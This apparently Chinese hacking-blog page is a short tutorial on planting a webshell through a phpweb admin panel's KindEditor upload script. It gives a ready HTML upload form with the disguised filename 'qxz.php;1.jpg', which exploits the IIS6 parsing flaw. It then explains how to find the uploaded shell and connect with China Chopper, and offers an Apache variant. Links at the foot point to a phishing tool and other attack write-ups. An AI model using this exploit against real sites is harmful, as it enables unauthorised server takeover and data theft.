phpweb后台拿shell简单 ***
关于phpweb后台拿shell简单 *** 。
首先登录后台admin.php
登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把 www.xxx.com 改成你的目标网站地址。
代码文件如下:
<form name=”uploadForm” method=”post” enctype=”multipart/form-data” action=”http://www.xxx.com/kedit/upload_cgi/upload.php”>
<input type=”text” name=”fileName” value=”qxz.php;1.jpg” />
<input type=”hidden” name=”attachPath” value=”news/pics/” />
<input type=”file” name=”fileData” size=”14″ /></td>
<input type=”submit” name=”button” value=”确定” />
</form>
<input type=”text” name=”fileName” value=”qxz.php;1.jpg” />
<input type=”hidden” name=”attachPath” value=”news/pics/” />
<input type=”file” name=”fileData” size=”14″ /></td>
<input type=”submit” name=”button” value=”确定” />
</form>
然后选择你的马儿再上传
上传后如果为iis6,就点击查看源码就可以找到马儿的路径了。
菜刀链接看下
PS:qxz.php;1.jpg这样的文件是允许上传的,只要服务器是IIS6就拿到webshell,低版本的apache可以试着重命名为qxz.php.jpg
代码文件下载地址:http://pan.baidu.com/s/1eRzHs
相关文章
L1080htCrack是完全免费的吗?
什么叫L1080htCrack? L1080htCrack是由Mudge最开始建立的修复和登陆密码审批专用工具。它试着从单独的Windows服务中心,主域控制器,连接网络网络服务器或Active D...
软件漏洞分析技巧分享
在日常分析软件漏洞时,经常需要耗费比较长的分析时间,少则几小时,多则数天,甚至更久。因此,经常总结一些分析技巧是非常有必要的,针对不同的漏洞类型采取不同的分析思路和技巧,可以有效地提高分析速度。对于一...
怎么教你怎么用黑客技术攻击网站&nbsp;&nbsp;分享8个强大的黑客技术学习网站
黑客攻击是一项很难掌握的技能,在很大的程度上要求人们对计算机和软件架构的各种概念和网络系统有深入的了解,今天,分享8个道德黑客学习可以利用的网站 黑客主要有两种:黑帽黑客、白帽...
记一次phpcms v9后台拿shell过程
记一次phpcms v9后台拿shell过程 登录进入后台管理后,点击界面,模板风格,然后点击祥细列表,如下图: 然后点击 search 这个文件夹,如下图: 然...
HiddenEye免费下载
HiddenEye是一款具备高級作用的当代互联网钓鱼工具,而且还适用Android系统软件。 HiddenEye必须大家的电脑上自然环境考虑下列规定: Python 3 Python...
总结一些上传漏洞利用方法
1.直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就利用IIS6.0解析漏洞”:1.asp;1.jpg/1.asp;.jpg/1.asp;jpg/1.a...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!